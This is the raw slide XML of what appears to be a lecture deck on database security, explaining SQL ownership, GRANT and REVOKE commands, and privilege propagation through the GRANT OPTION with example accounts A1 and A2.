                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, which is typically the account that was used when the relation was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created.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>The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owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> is given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>all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 privileges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>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>on that relation.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In SQL2, the DBA can assign an owner to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>a whole schema </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>by creating the schema and associating the appropriate authorization identifier with that schema, using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CREATE SCHEMA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>.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The owner account holder can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pass privileges </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>on any of the owned relation to other users by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privileges to their accounts.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63" y="4464050"/>
            <a:ext cx="4743450" cy="1655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48700" y="6386513"/>
            <a:ext cx="409575" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A3F441BA-9AA6-487B-B95B-46AF4F0CEEA2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460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An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835025"/>
            <a:ext cx="8886825" cy="41767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Suppose that the DBA creates four accounts --A1, A2, A3, and A4--  and wants only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A1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 to be able to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create base relations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; then the DBA must issue the following GRANT command in SQL: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TW" sz="2000" b="1" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>            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GRANT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CREATETAB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 TO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A1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defRPr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In SQL2 the same effect can be accomplished by having the DBA issue a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CREATE SCHEMA command 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as follows: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a typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>            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CREATE SCHEMA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COMPANY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 AUTHORIZATION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A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="290CD6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User account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A1 can create tables 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under the schema called </a:t>
            </a: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COMPANY</a:t>
            </a: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6963" y="4543425"/>
            <a:ext cx="29860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1388" y="5072063"/>
            <a:ext cx="1263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向右箭號 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2809875" y="5591175"/>
            <a:ext cx="657225" cy="266700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2695575" y="5743575"/>
            <a:ext cx="782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grant</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28681" name="矩形 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1706563" y="6159500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DBA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28682" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3597275" y="6191250"/>
            <a:ext cx="158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A1(owner)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28683" name="Picture 5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2575" y="5011738"/>
            <a:ext cx="11303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4" name="Picture 4" descr="j019538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3063" y="5221288"/>
            <a:ext cx="97313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向右箭號 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5081588" y="5624513"/>
            <a:ext cx="1370012" cy="266700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28686" name="矩形 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4938713" y="5786438"/>
            <a:ext cx="1589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grant/revoke</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28687" name="矩形 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6888163" y="6215063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A2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:ea typeface="新細明體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51A5B4-1909-419E-AA3E-1B3164303885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22238"/>
            <a:ext cx="8774112" cy="6778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Privileges in SQL on Relation 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844550"/>
            <a:ext cx="8545512" cy="4822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b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>SELECT (retrieval or read) privilege on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charset="-120"/>
              </a:rPr>
              <a:t>gives the account the privilege to use the SELECT statement to retrieve tuples from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>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>MODIFY privileges on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charset="-120"/>
              </a:rPr>
              <a:t>In SQL this privilege is further divided into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UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>,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DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, and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INSERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> privileges to apply the corresponding SQL command to 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charset="-120"/>
              </a:rPr>
              <a:t>In addition, both the INSERT and UPDATE privileges can specify that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only certain attributes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>can be updated by the account.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>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>REFERENCES privilege on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charset="-120"/>
              </a:rPr>
              <a:t>gives the account the capability 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reference relation R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>when specifying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integrity constraints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" charset="-12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charset="-120"/>
              </a:rPr>
              <a:t>The privilege can also be restricted to specific attributes of R.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7600" y="5675313"/>
            <a:ext cx="29860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5338" y="5795963"/>
            <a:ext cx="993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向右箭號 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3238500" y="6000750"/>
            <a:ext cx="1370013" cy="266700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29704" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4862513" y="5976938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R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BDF618-B2C6-4E9A-B799-E6C04A6216C5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An Example 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58850"/>
            <a:ext cx="8774112" cy="3054350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> creates the two base relations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>EMPLOYEE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>DEPARTMENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
          </a:p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A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is then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owner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> and hence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" i="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>all the relation privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>on each of them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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A1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>wants to grant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A2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>the privilege to insert and delete tuples in both of these relations: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      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>GRANT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 INSERT, DELETE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>ON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 EMPLOYEE, DEPARTMENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>TO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 A2;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30725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4146550"/>
            <a:ext cx="4090987" cy="995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26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513" y="4822825"/>
            <a:ext cx="1263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矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3297238" y="5922963"/>
            <a:ext cx="1562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A1: owner</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30728" name="Picture 4" descr="j01953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5888" y="4972050"/>
            <a:ext cx="97313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向右箭號 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4824413" y="5375275"/>
            <a:ext cx="1370012" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49990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30730" name="矩形 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5072063" y="5070475"/>
            <a:ext cx="782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grant</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30731" name="矩形 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="5965825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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>A2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30732" name="矩形 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5076825" y="5541963"/>
            <a:ext cx="1150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baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>INSERT DELETE </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600">
              <a:ea typeface="新細明體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31225" y="6386513"/>
            <a:ext cx="527050" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0362A30B-FB86-424B-B091-4F3D79CCB07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Revoking Privileges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669925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>REVOKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> command is for the purpose of canceling privileges.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31749" name="群組 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1055688" y="2847975"/>
            <a:ext cx="5635625" cy="1982788"/>
            <a:chOff x="1055688" y="2847976"/>
            <a:chExt cx="5635625" cy="1982787"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31751" name="矩形 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2549525" y="4325938"/>
              <a:ext cx="15621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400" b="1" baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>A1: owner</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31752" name="Picture 4" descr="j019538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8175" y="3375026"/>
              <a:ext cx="973138" cy="993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3" name="向右箭號 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4076700" y="3778251"/>
              <a:ext cx="1370013" cy="266700"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 49990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1754" name="矩形 8"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4138613" y="3473451"/>
              <a:ext cx="12906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REVOKE</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31755" name="矩形 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5883275" y="4368801"/>
              <a:ext cx="5619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baseline="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>A2</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31756" name="矩形 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4259263" y="3944938"/>
              <a:ext cx="11509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 b="1" baseline="0">
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:rPr>
                <a:t>SELECT</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31757" name="Picture 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5688" y="2847976"/>
              <a:ext cx="2532062" cy="615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758" name="Picture 5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0800" y="3225801"/>
              <a:ext cx="12636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50" name="矩形 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1158875" y="1944688"/>
            <a:ext cx="6708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baseline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baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>REVOKE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> EMPLOYEE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> A2;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" baseline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E69798-BA4D-49D8-BD9F-6A727524651D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Propagation of Privileges using the GRANT OPTION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60450"/>
            <a:ext cx="8774112" cy="3741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Whenever the owner A of a relation R grants a privilege on R to another account B, privilege can be given to B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>with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i="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>without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 the GRANT OPTION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體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If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>GRANT OPTION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>is given, this means that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B can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>also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grant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> that privilege on R to other accounts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In this way, privileges on R can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propagate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> to other accounts without the knowledge of the owner of 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If the owner account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 now revokes the privilege granted to B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>, all the privileges that B propagated based on that privilege should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automatically be revoked </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>by the system.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32773" name="群組 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1924050" y="4886325"/>
            <a:ext cx="4883150" cy="982663"/>
            <a:chOff x="1924050" y="4885931"/>
            <a:chExt cx="4883150" cy="982663"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32774" name="Picture 5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4050" y="4974831"/>
              <a:ext cx="942975" cy="89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5" name="Picture 4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0050" y="5108181"/>
              <a:ext cx="73025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向右箭號 6"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3028950" y="5214544"/>
              <a:ext cx="982663" cy="2667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2777" name="矩形 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3133725" y="5319319"/>
              <a:ext cx="7826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grant</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
                <a:ea typeface="新細明體" charset="-120"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32778" name="Picture 4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6950" y="5122469"/>
              <a:ext cx="73025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向右箭號 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5027613" y="5214544"/>
              <a:ext cx="982662" cy="2667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2780" name="矩形 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5132388" y="5319319"/>
              <a:ext cx="7826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grant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2781" name="矩形 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2779713" y="4908156"/>
              <a:ext cx="3698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A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2782" name="矩形 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3943350" y="4885931"/>
              <a:ext cx="3556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B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2783" name="矩形 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5807075" y="4885931"/>
              <a:ext cx="371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C</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" baseline="0">
                <a:ea typeface="新細明體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933700" y="5705941"/>
            <a:ext cx="160695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ith GRANT option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BE78CC-7140-40E1-9CE2-E250AA96A30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charset="-120"/>
              </a:rPr>
              <a:t>Chapter Outline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303338"/>
            <a:ext cx="8048625" cy="49974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Introduction to Database Security Issues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Discretionary Access Control Based on Granting Revoking Privileges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Mandatory Access Control and Role-Based Access Control for Multilevel Security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SQL Injection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Introduction to Statistical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Introduction to Flow Control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Encryption and Public Key Infrastructures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Privacy Issues and Preservation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Challenges of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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Oracle Label-Based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77250" y="6386513"/>
            <a:ext cx="581025" cy="387350"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ABB841AC-5316-4337-A7AF-0C70BC808BB9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-1588"/>
            <a:ext cx="8774112" cy="884238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An Example (3)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806450"/>
